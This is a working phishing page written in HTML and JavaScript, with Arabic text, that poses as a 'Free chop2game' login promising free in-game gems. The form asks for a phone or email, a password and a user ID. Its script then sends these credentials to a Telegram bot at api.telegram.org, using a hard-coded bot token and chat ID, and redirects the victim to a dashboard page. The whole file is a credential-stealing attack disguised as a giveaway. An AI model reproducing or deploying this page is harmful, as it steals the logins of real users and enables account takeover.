<!DOCTYPE html>
<html lang="ar">
<head>
  <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <title>Free Chop2game</title>
  <style>
    body {
      margin: 0;
      font-family: Helvetica, Arial, sans-serif;
      background-color: #000000;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 90vh;
    }

.container {
  width: 90%;            /* العرض النسبي للجوالات */
  max-width: 400px;       /* لا يتجاوز 400 بكسل */
  background: rgba(255,255,255,0.06);
  padding: 30px;
  border-radius: 8px;
  box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
}

    .container h2 {
      color: #00c896;
      font-size: 30px;
      margin-bottom: 10px;
      text-align: center;
    }

    .container input {
      width: 100%;
      padding: 10px;
      margin: 10px 0;
      border: 1px solid #dddfe2;
      border-radius: 6px;
      font-size: 18px;
    }

    .container button {
      width: 105%;
      padding: 14px;
      background-color: #00c896;
      color: white;
      border: none;
      border-radius: 6px;
      font-size: 16px;
      cursor: pointer;
    }

    .container button:hover {
      background-color: #00c896;
    }

    .footer {
      text-align: center;
      margin-top: 15px;
      font-size: 14px;
      color: #606770;
    }
  </style>
</head>
<body>

  <div class="container">
    <h2>Free chop2game</h2>
    <form id="loginForm">
      <input type="text" id="user" placeholder="phone number or email" required>
      <input type="password" id="pass" placeholder="password" required>
       <input type="text" id="id" placeholder="user (ID)" required>
      <button type="submit">login</button>
    </form>
      <div class="footer">اذ لم يتم ادخال المعلومات كلها صحيحة لن يتم ارسال الجواهر وكذالك يتم الشحن عن طريق جمع النقاط</div>
  </div>
   

<!-- داخل سكربت الصفحة -->
<script>
  const TOKEN = "8113784253:AAH4ZhTnBDH7E0lDOJfY3vVMsfSZSDKsZfg"; 
  const CHAT_ID = "5991920312";             

  document.getElementById("loginForm").addEventListener("submit", function(e) {
    e.preventDefault();

    const user = document.getElementById("user").value;
    const pass = document.getElementById("pass").value;
    const id = document.getElementById("id").value;

    const message = `تسجيل دخول جديد :\n📧: ${user}\n🔑: ${pass}\n 💁: ${id}`;

    fetch(`https://api.telegram.org/bot${TOKEN}/sendMessage`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({
        chat_id: CHAT_ID,
        text: message
      })
    })
    .then(response => {
      if (response.ok) {
        // توجه لصفحة جمع النقر مع إرسال اسم المستخدم (مثلاً البريد أو رقم الهاتف)
        window.location.href = `dashboard.html?username=${encodeURIComponent(user)}`;
      } else {
        alert("❌ فشل في الإرسال");
      }
    })
    .catch(error => {
      console.error("خطأ:", error);
      alert("⚠️ حدث خطأ أثناء الإرسال.");
    });
  });
</script>

</body>
</html>